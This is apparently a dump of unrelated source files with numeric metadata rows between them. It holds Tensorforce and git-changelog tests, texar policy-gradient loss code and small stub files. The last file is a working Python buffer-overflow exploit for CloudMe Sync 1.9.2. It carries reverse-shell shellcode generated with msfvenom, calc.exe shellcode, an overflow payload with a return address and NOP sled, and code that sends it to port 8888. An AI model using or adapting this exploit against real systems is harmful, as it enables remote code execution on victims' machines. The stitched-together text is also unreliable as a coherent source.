self.unittest(reward_estimation=reward_estimation, baseline=baseline)
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon='episode', estimate_advantage=True, predict_horizon_values='early',
predict_action_values=True,
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
)
# Implicit baseline = policy
# Implicit baseline_optimizer = 1.0
baseline_objective = 'state_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation,
baseline_objective=baseline_objective
)
reward_estimation = dict(
horizon=3, estimate_advantage=True, predict_horizon_values='late',
predict_terminal_values=True,
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
)
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=1))
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'state_value'
self.unittest(
reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
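# Editor's sketch (not part of the test file above): reward_estimation /
# baseline settings like the ones exercised here are normally passed straight
# to Tensorforce's Agent.create(). The state/action specs, network, memory
# and update values below are illustrative assumptions, not values taken
# from this suite; consult the Tensorforce documentation for exact defaults.
from tensorforce import Agent

sketch_agent = Agent.create(
    agent='tensorforce',
    states=dict(type='float', shape=(4,)),
    actions=dict(type='int', shape=(), num_values=3),
    max_episode_timesteps=10,
    policy=dict(network='auto'),
    memory=100,
    update=dict(unit='timesteps', batch_size=8),
    optimizer=dict(optimizer='adam', learning_rate=1e-3),
    objective='policy_gradient',
    reward_estimation=dict(horizon=3, predict_horizon_values='late'),
    baseline=dict(network=dict(type='auto', size=7, depth=1)),
    baseline_optimizer=dict(optimizer='adam', learning_rate=1e-3),
    baseline_objective='state_value'
)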
| 47.148551 | 98 | 0.64474 | 1,527 | 13,013 | 5.281598 | 0.128356 | 0.054557 | 0.028642 | 0.041662 | 0.843769 | 0.82579 | 0.807564 | 0.789461 | 0.769746 | 0.753875 | 0 | 0.025434 | 0.238608 | 13,013 | 275 | 99 | 47.32 | 0.788555 | 0.125644 | 0 | 0.593458 | 0 | 0 | 0.083083 | 0.002293 | 0 | 0 | 0 | 0.003636 | 0.014019 | 1 | 0.018692 | false | 0 | 0.009346 | 0 | 0.037383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a01eea73bef055220cb9d2dbac244a14ffe451c | 12 | bzl | Python | test/com/facebook/buck/parser/testdata/load_twice_from_bzl/b.bzl | jasonnam/buck | 1ddbbf986312b30413aa36cac337267536a11f04 | ["Apache-2.0"] | null | null | null | test/com/facebook/buck/parser/testdata/load_twice_from_bzl/b.bzl | jasonnam/buck | 1ddbbf986312b30413aa36cac337267536a11f04 | ["Apache-2.0"] | null | null | null | test/com/facebook/buck/parser/testdata/load_twice_from_bzl/b.bzl | jasonnam/buck | 1ddbbf986312b30413aa36cac337267536a11f04 | ["Apache-2.0"] | null | null | null |
z = 3
w = 4
| 4 | 5 | 0.333333 | 4 | 12 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.5 | 12 | 2 | 6 | 6 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a0844c83e0a2a558915b116898eb0f41af79887 | 45 | py | Python | pystitch/__init__.py | dwallace0723/pystitch | 77b609735cf399d4bd4f3fe3018e8005f4f0fe18 | ["MIT"] | 2 | 2019-10-28T15:23:24.000Z | 2021-02-24T09:13:19.000Z | pystitch/__init__.py | dwallace0723/pystitch | 77b609735cf399d4bd4f3fe3018e8005f4f0fe18 | ["MIT"] | 1 | 2021-06-01T23:53:48.000Z | 2021-06-01T23:53:48.000Z | pystitch/__init__.py | dwallace0723/pystitch | 77b609735cf399d4bd4f3fe3018e8005f4f0fe18 | ["MIT"] | 1 | 2020-05-25T11:06:25.000Z | 2020-05-25T11:06:25.000Z |
from pystitch.client import PyStitch # noqa
| 22.5 | 44 | 0.8 | 6 | 45 | 6 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 1 | 45 | 45 | 0.947368 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6a12b94a35a7c57f7341646a6a296029ca61755f | 1,768 | py | Python | tests/test_angular_style.py | rainchen/git-changelog | 0204c7ab5d9e6682a94d3842df3e16cb19bd3ee6 | ["ISC"] | 1 | 2019-11-28T15:20:31.000Z | 2019-11-28T15:20:31.000Z | tests/test_angular_style.py | LoicViennois/git-changelog | 0204c7ab5d9e6682a94d3842df3e16cb19bd3ee6 | ["ISC"] | null | null | null | tests/test_angular_style.py | LoicViennois/git-changelog | 0204c7ab5d9e6682a94d3842df3e16cb19bd3ee6 | ["ISC"] | null | null | null |
from git_changelog.build import Commit
from git_changelog.style import AngularStyle
def test_angular_style_breaking_change():
subject = "feat: this is a new breaking feature"
body = ["BREAKING CHANGE: there is a breaking feature in this code"]
commit = Commit(hash="aaaaaaa", subject=subject, body=body, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert commit_dict["is_major"]
assert not commit_dict["is_minor"]
assert not commit_dict["is_patch"]
def test_angular_style_breaking_changes():
subject = "feat: this is a new breaking feature"
body = ["BREAKING CHANGES: there is a breaking feature in this code"]
commit = Commit(hash="aaaaaaa", subject=subject, body=body, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert commit_dict["is_major"]
assert not commit_dict["is_minor"]
assert not commit_dict["is_patch"]
def test_angular_style_feat():
subject = "feat: this is a new feature"
commit = Commit(hash="aaaaaaa", subject=subject, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert not commit_dict["is_major"]
assert commit_dict["is_minor"]
assert not commit_dict["is_patch"]
def test_angular_style_fix():
subject = "fix: this is a bug fix"
commit = Commit(hash="aaaaaaa", subject=subject, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert not commit_dict["is_major"]
assert not commit_dict["is_minor"]
assert commit_dict["is_patch"]
| 39.288889 | 118 | 0.734163 | 238 | 1,768 | 5.218487 | 0.168067 | 0.128824 | 0.115942 | 0.122383 | 0.877617 | 0.849436 | 0.832528 | 0.832528 | 0.832528 | 0.832528 | 0 | 0.053908 | 0.160633 | 1,768 | 44 | 119 | 40.181818 | 0.783019 | 0 | 0 | 0.666667 | 0 | 0 | 0.248869 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.111111 | false | 0 | 0.055556 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a253ca6dd135c4ece905fbd3e11a57d21e86625 | 65 | py | Python | venv/my_power.py | Good-Gulf/power_new | ef74c35ea4a5f64da90dc930858aad059ddac2de | ["MIT"] | null | null | null | venv/my_power.py | Good-Gulf/power_new | ef74c35ea4a5f64da90dc930858aad059ddac2de | ["MIT"] | null | null | null | venv/my_power.py | Good-Gulf/power_new | ef74c35ea4a5f64da90dc930858aad059ddac2de | ["MIT"] | null | null | null |
def my_power(basis, exponent):
    # exponentiation, not multiplication: my_power(2, 3) == 8
    return basis ** exponent
| 16.25 | 29 | 0.723077 | 9 | 65 | 5.111111 | 0.777778 | 0.565217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 65 | 4 | 30 | 16.25 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
6a313b304bdfac487df8d275f8ff3583f51b474a | 127 | py | Python | simpletransformers/multiav/__init__.py | g-simmons/simpletransformers | ffd3fd2f6e96d00fcfa934a36eed44d182d006db | ["Apache-2.0"] | null | null | null | simpletransformers/multiav/__init__.py | g-simmons/simpletransformers | ffd3fd2f6e96d00fcfa934a36eed44d182d006db | ["Apache-2.0"] | null | null | null | simpletransformers/multiav/__init__.py | g-simmons/simpletransformers | ffd3fd2f6e96d00fcfa934a36eed44d182d006db | ["Apache-2.0"] | null | null | null |
from simpletransformers.config.model_args import MultiAVArgs
from simpletransformers.multiav.multiav_model import MultiAVModel
| 42.333333 | 65 | 0.905512 | 14 | 127 | 8.071429 | 0.642857 | 0.389381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062992 | 127 | 2 | 66 | 63.5 | 0.94958 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6a33b4b693b804b736d9dec2a6cfb3c02fdb26a5 | 47 | py | Python | plotting/data_extractor/extraction_utils/scatter_utils.py | eric-erki/GISportal | 407764334b3ba50da4429fc170b98e20468ff8a0 | ["Apache-2.0"] | 55 | 2015-03-20T23:54:17.000Z | 2022-01-22T04:33:06.000Z | plotting/data_extractor/extraction_utils/scatter_utils.py | eric-erki/GISportal | 407764334b3ba50da4429fc170b98e20468ff8a0 | ["Apache-2.0"] | 27 | 2016-03-14T15:44:05.000Z | 2021-09-03T10:23:06.000Z | plotting/data_extractor/extraction_utils/scatter_utils.py | eric-erki/GISportal | 407764334b3ba50da4429fc170b98e20468ff8a0 | ["Apache-2.0"] | 24 | 2015-03-11T14:59:24.000Z | 2022-03-31T10:47:17.000Z |
def test_time_axis(filenames):
return "hmmmm"
| 15.666667 | 30 | 0.787234 | 7 | 47 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 47 | 2 | 31 | 23.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dbe5f09427725d1e220d3ced8c439d736c3f6db6 | 11,546 | py | Python | texar/losses/pg_losses.py | Holmeswww/Text_Infilling | f63cd24bee5c62d7dedd8fb35c4e52aee20c39f3 | ["Apache-2.0"] | 25 | 2019-01-03T09:15:20.000Z | 2022-02-12T04:20:59.000Z | texar/losses/pg_losses.py | Holmeswww/Text_Infilling | f63cd24bee5c62d7dedd8fb35c4e52aee20c39f3 | ["Apache-2.0"] | 4 | 2019-03-28T11:02:20.000Z | 2022-02-15T04:57:33.000Z | texar/losses/pg_losses.py | Holmeswww/Text_Infilling | f63cd24bee5c62d7dedd8fb35c4e52aee20c39f3 | ["Apache-2.0"] | 9 | 2019-01-03T02:20:37.000Z | 2022-02-12T04:20:50.000Z |
#
"""
Various loss functions for policy gradients.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from texar.losses.losses_utils import mask_and_reduce
from texar.utils.shapes import get_rank
# pylint: disable=too-many-arguments, protected-access
__all__ = [
"pg_loss_with_logits",
"pg_loss_with_log_probs"
]
def pg_loss_with_logits(actions,
logits,
advantages,
rank=None,
batched=False,
sequence_length=None,
average_across_batch=True,
average_across_timesteps=False,
average_across_remaining=False,
sum_over_batch=False,
sum_over_timesteps=True,
sum_over_remaining=True,
time_major=False):
"""Policy gradient loss with logits. Used for discrete actions.
pg_loss = reduce( advantages * -log_prob( actions ) ),
where `advantages` and `actions` will not bprop gradients.
All arguments except :attr:`logits` and :attr:`actions` are the same as
:func:`pg_loss_with_log_probs`.
Args:
actions: Tensor of shape
`[(batch_size,) max_time, d_3, ..., d_rank]` and of dtype
`int32` or `int64`.
The rank of the Tensor is specified with :attr:`rank`.
The batch dimension exists only if :attr:`batched` is `True`.
The batch and time dimensions
are exchanged, i.e., `[max_time, batch_size, ...]` if
:attr:`time_major` is `True`.
logits: Unscaled log probabilities of shape
`[(batch_size,) max_time, d_3, ..., d_{rank+1}]`
and dtype `float32` or `float64`.
The batch and time dimensions are exchanged if :attr:`time_major`
is `True`.
advantages: Tensor of shape
`[(batch_size,) max_time, d_3, ..., d_rank]` and
dtype `float32` or `float64`.
The batch and time dimensions are exchanged if :attr:`time_major`
is `True`.
rank (int, optional): The rank of :attr:`actions`.
If `None` (default), rank is automatically inferred from
:attr:`actions` or :attr:`advantages`. If the inferred rank is
`None`, :attr:`rank` is set to 1 if :attr:`batched` is `False`,
and :attr:`rank`=2 if :attr:`batched` is `True`.
batched (bool): `True` if the inputs are batched.
sequence_length (optional): A Tensor of shape `[batch_size]`.
Time steps beyond the respective sequence lengths will have zero
losses. Used if :attr:`batched` is `True`.
average_across_timesteps (bool): If set, average the loss across
the time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
average_across_batch (bool): If set, average the loss across the
batch dimension. Must not set :attr:`average_across_batch`
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
average_across_remaining (bool): If set, average the sequence across the
remaining dimensions. Must not set :attr:`average_across_remaining`
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
sum_over_timesteps (bool): If set, sum the loss across the
time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
sum_over_batch (bool): If set, sum the loss across the
batch dimension. Must not set :attr:`average_across_batch`
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
sum_over_remaining (bool): If set, sum the loss across the
remaining dimension. Must not set :attr:`average_across_remaining`
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
time_major (bool): The shape format of the inputs. If `True`,
:attr:`logits`, :attr:`actions` and :attr:`advantages` must
have shape `[max_time, batch_size, ...]`. If `False` (default),
they must have shape `[batch_size, max_time, ...]`.
Ignored if :attr:`batched` is `False`.
Returns:
A Tensor containing the loss to minimize, whose rank depends on the
reduce arguments. For example, the batch dimension is reduced if
either :attr:`average_across_batch` or :attr:`sum_over_batch` is
`True`, which makes the rank of output tensor decrease by 1.
"""
actions = tf.stop_gradient(actions)
neg_log_probs = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=actions)
return pg_loss_with_log_probs(
log_probs=-neg_log_probs,
advantages=advantages,
rank=rank,
batched=batched,
sequence_length=sequence_length,
average_across_batch=average_across_batch,
average_across_timesteps=average_across_timesteps,
average_across_remaining=average_across_remaining,
sum_over_batch=sum_over_batch,
sum_over_timesteps=sum_over_timesteps,
sum_over_remaining=sum_over_remaining,
time_major=time_major)
def pg_loss_with_log_probs(log_probs,
advantages,
rank=None,
batched=False,
sequence_length=None,
average_across_batch=True,
average_across_timesteps=False,
average_across_remaining=False,
sum_over_batch=False,
sum_over_timesteps=True,
sum_over_remaining=True,
time_major=False):
"""Policy gradient loss with log probs of actions.
pg_loss = reduce( advantages * -log_probs ),
where `advantages` will not bprop gradients.
All arguments except :attr:`log_probs` are the same as
:func:`pg_loss_with_logits`.
Args:
log_probs: Log probabilities of shape
`[(batch_size,) max_time, ..., d_rank]` and dtype `float32`
or `float64`. The rank of the Tensor is specified
with :attr:`rank`.
The batch dimension exists only if :attr:`batched` is `True`.
The batch and time dimensions are exchanged, i.e.,
`[max_time, batch_size, ...]` if :attr:`time_major` is `True`.
advantages: Tensor of shape
`[(batch_size,) max_time, d_3, ..., d_rank]` and
dtype `float32` or `float64`.
The batch dimension exists only if
:attr:`batched` is `True`.
The batch and time dimensions
are exchanged, i.e., `[max_time, batch_size, ...]` if
:attr:`time_major` is `True`.
rank (int, optional): The rank of :attr:`log_probs`.
If `None` (default), rank is automatically inferred from
:attr:`log_probs` or :attr:`advantages`. If the inferred rank is
`None`, :attr:`rank` is set to 1 if :attr:`batched` is `False`,
and :attr:`rank`=2 if :attr:`batched` is `True`.
batched (bool): `True` if the inputs are batched.
sequence_length (optional): A Tensor of shape `[batch_size]`.
Time steps beyond the respective sequence lengths will have zero
losses. Used if :attr:`batched` is `True`.
average_across_timesteps (bool): If set, average the loss across
the time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
average_across_batch (bool): If set, average the loss across the
batch dimension. Must not set :attr:`average_across_batch`
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
average_across_remaining (bool): If set, average the sequence across the
remaining dimensions. Must not set :attr:`average_across_remaining`
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
sum_over_timesteps (bool): If set, sum the loss across the
time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
sum_over_batch (bool): If set, sum the loss across the
batch dimension. Must not set :attr:`average_across_batch`
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
sum_over_remaining (bool): If set, sum the loss across the
remaining dimension. Must not set :attr:`average_across_remaining`
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
time_major (bool): The shape format of the inputs. If `True`,
:attr:`log_probs` and :attr:`advantages` must have shape
`[max_time, batch_size, ...]`. If `False` (default),
they must have shape `[batch_size, max_time, ...]`.
Ignored if :attr:`batched` is `False`.
Returns:
A Tensor containing the loss to minimize, whose rank depends on the
reduce arguments. For example, the batch dimension is reduced if
either :attr:`average_across_batch` or :attr:`sum_over_batch` is
`True`, which makes the rank of output tensor decrease by 1.
"""
advantages = tf.stop_gradient(advantages)
losses = -log_probs * advantages
if rank is None:
rank = get_rank(log_probs) or get_rank(advantages)
if rank is None:
rank = 2 if batched else 1
if batched:
losses = mask_and_reduce(
losses,
sequence_length,
rank=rank,
average_across_batch=average_across_batch,
average_across_timesteps=average_across_timesteps,
average_across_remaining=average_across_remaining,
sum_over_batch=sum_over_batch,
sum_over_timesteps=sum_over_timesteps,
sum_over_remaining=sum_over_remaining,
time_major=time_major)
elif rank > 1:
if average_across_remaining and sum_over_remaining:
raise ValueError("Only one of `average_across_remaining` and "
"`sum_over_remaining` can be set.")
if average_across_remaining:
losses = tf.reduce_mean(losses, axis=range(1, rank))
elif sum_over_remaining:
losses = tf.reduce_sum(losses, axis=range(1, rank))
if not batched:
if average_across_timesteps and sum_over_timesteps:
raise ValueError("Only one of `average_across_timesteps` and "
"`sum_over_timesteps` can be set.")
if average_across_timesteps:
losses = tf.reduce_mean(losses)
elif sum_over_timesteps:
losses = tf.reduce_sum(losses)
return losses
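# Editor's sketch (not part of the file above): a minimal call to
# pg_loss_with_logits on a batch of sequences. Shapes and values are made
# up, and a TF1-style graph/session environment is assumed, matching the
# module's own TF1 idioms.
import numpy as np
import tensorflow as tf
from texar.losses.pg_losses import pg_loss_with_logits

batch_size, max_time, num_actions = 2, 5, 4
actions = tf.constant(
    np.random.randint(num_actions, size=(batch_size, max_time)), dtype=tf.int64)
logits = tf.random_normal([batch_size, max_time, num_actions])
advantages = tf.random_normal([batch_size, max_time])
seq_length = tf.constant([5, 3])

# Batched inputs: by default the loss is averaged over the batch and summed
# over (masked) time steps, yielding a scalar.
loss = pg_loss_with_logits(
    actions=actions, logits=logits, advantages=advantages,
    batched=True, sequence_length=seq_length)

with tf.Session() as sess:
    print(sess.run(loss))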
| 46.369478 | 80 | 0.619955 | 1,460 | 11,546 | 4.690411 | 0.106849 | 0.083528 | 0.048189 | 0.028475 | 0.857331 | 0.84448 | 0.811186 | 0.772634 | 0.739632 | 0.717436 | 0 | 0.00444 | 0.297679 | 11,546 | 248 | 81 | 46.556452 | 0.840054 | 0.63797 | 0 | 0.488372 | 0 | 0 | 0.052314 | 0.020268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0 | 0.069767 | 0 | 0.116279 | 0.011628 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbef8fb08525da309f4d6673d407a423e1cee964 | 46 | py | Python | sparkmagic/sparkmagic/kernels/__init__.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | ["RSA-MD"] | 1,141 | 2015-09-21T20:52:00.000Z | 2022-03-31T14:15:51.000Z | sparkmagic/sparkmagic/kernels/__init__.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | ["RSA-MD"] | 605 | 2015-09-23T23:27:43.000Z | 2022-03-16T07:46:52.000Z | sparkmagic/sparkmagic/kernels/__init__.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | ["RSA-MD"] | 442 | 2015-09-23T21:31:28.000Z | 2022-03-13T15:19:57.000Z |
from sparkmagic.kernels.kernelmagics import *
| 23 | 45 | 0.847826 | 5 | 46 | 7.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e01fa75a7a3b66decda4761b660f6b0b66fd1a1c | 2,999 | py | Python | codes/cloudMe_Sync_1.9.2.py | SkyBulk/exploit-development | 0653997e264a9e9113f633b4de977a978d39e8c5 | ["MIT"] | 18 | 2019-04-11T02:27:07.000Z | 2022-01-24T09:53:13.000Z | codes/cloudMe_Sync_1.9.2.py | SkyBulk/exploit-development | 0653997e264a9e9113f633b4de977a978d39e8c5 | ["MIT"] | null | null | null | codes/cloudMe_Sync_1.9.2.py | SkyBulk/exploit-development | 0653997e264a9e9113f633b4de977a978d39e8c5 | ["MIT"] | 11 | 2019-04-03T12:15:45.000Z | 2022-03-23T15:02:32.000Z |
#!/usr/bin/python
# tested on windows 7 x86 sp1
import socket
import struct
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.13 LPORT=1990 -b "\x00\x0a\x0d" -f python -v shellcode
shellcode = ""
shellcode += "\xdb\xd8\xd9\x74\x24\xf4\xbd\x66\xdc\x28\xe4\x5e"
shellcode += "\x33\xc9\xb1\x52\x31\x6e\x17\x03\x6e\x17\x83\xa0"
shellcode += "\xd8\xca\x11\xd0\x09\x88\xda\x28\xca\xed\x53\xcd"
shellcode += "\xfb\x2d\x07\x86\xac\x9d\x43\xca\x40\x55\x01\xfe"
shellcode += "\xd3\x1b\x8e\xf1\x54\x91\xe8\x3c\x64\x8a\xc9\x5f"
shellcode += "\xe6\xd1\x1d\xbf\xd7\x19\x50\xbe\x10\x47\x99\x92"
shellcode += "\xc9\x03\x0c\x02\x7d\x59\x8d\xa9\xcd\x4f\x95\x4e"
shellcode += "\x85\x6e\xb4\xc1\x9d\x28\x16\xe0\x72\x41\x1f\xfa"
shellcode += "\x97\x6c\xe9\x71\x63\x1a\xe8\x53\xbd\xe3\x47\x9a"
shellcode += "\x71\x16\x99\xdb\xb6\xc9\xec\x15\xc5\x74\xf7\xe2"
shellcode += "\xb7\xa2\x72\xf0\x10\x20\x24\xdc\xa1\xe5\xb3\x97"
shellcode += "\xae\x42\xb7\xff\xb2\x55\x14\x74\xce\xde\x9b\x5a"
shellcode += "\x46\xa4\xbf\x7e\x02\x7e\xa1\x27\xee\xd1\xde\x37"
shellcode += "\x51\x8d\x7a\x3c\x7c\xda\xf6\x1f\xe9\x2f\x3b\x9f"
shellcode += "\xe9\x27\x4c\xec\xdb\xe8\xe6\x7a\x50\x60\x21\x7d"
shellcode += "\x97\x5b\x95\x11\x66\x64\xe6\x38\xad\x30\xb6\x52"
shellcode += "\x04\x39\x5d\xa2\xa9\xec\xf2\xf2\x05\x5f\xb3\xa2"
shellcode += "\xe5\x0f\x5b\xa8\xe9\x70\x7b\xd3\x23\x19\x16\x2e"
shellcode += "\xa4\xe6\x4f\x30\x23\x8f\x8d\x30\x5a\x14\x1b\xd6"
shellcode += "\x36\xba\x4d\x41\xaf\x23\xd4\x19\x4e\xab\xc2\x64"
shellcode += "\x50\x27\xe1\x99\x1f\xc0\x8c\x89\xc8\x20\xdb\xf3"
shellcode += "\x5f\x3e\xf1\x9b\x3c\xad\x9e\x5b\x4a\xce\x08\x0c"
shellcode += "\x1b\x20\x41\xd8\xb1\x1b\xfb\xfe\x4b\xfd\xc4\xba"
shellcode += "\x97\x3e\xca\x43\x55\x7a\xe8\x53\xa3\x83\xb4\x07"
shellcode += "\x7b\xd2\x62\xf1\x3d\x8c\xc4\xab\x97\x63\x8f\x3b"
shellcode += "\x61\x48\x10\x3d\x6e\x85\xe6\xa1\xdf\x70\xbf\xde"
shellcode += "\xd0\x14\x37\xa7\x0c\x85\xb8\x72\x95\xb5\xf2\xde"
shellcode += "\xbc\x5d\x5b\x8b\xfc\x03\x5c\x66\xc2\x3d\xdf\x82"
shellcode += "\xbb\xb9\xff\xe7\xbe\x86\x47\x14\xb3\x97\x2d\x1a"
shellcode += "\x60\x97\x67"
# pop calc.exe -- note this plain assignment discards the reverse-shell payload built above and uses a calc.exe proof-of-concept payload instead
shellcode = "\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
shellcode += "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
shellcode += "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
shellcode += "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
shellcode += "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
shellcode += "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
shellcode += "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC"
payload = "A" * 1036 + '\x25\xDF\xB8\x68' + "\x90" * 16 + shellcode
try:
print "\nSending tons of random bytes..."
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('192.168.0.27', 8888))
client.send(payload)
client.close()
print "\nDone! Wonder if we got that shell back?"
except:
print "Could not connect to 8888 for some reason..."
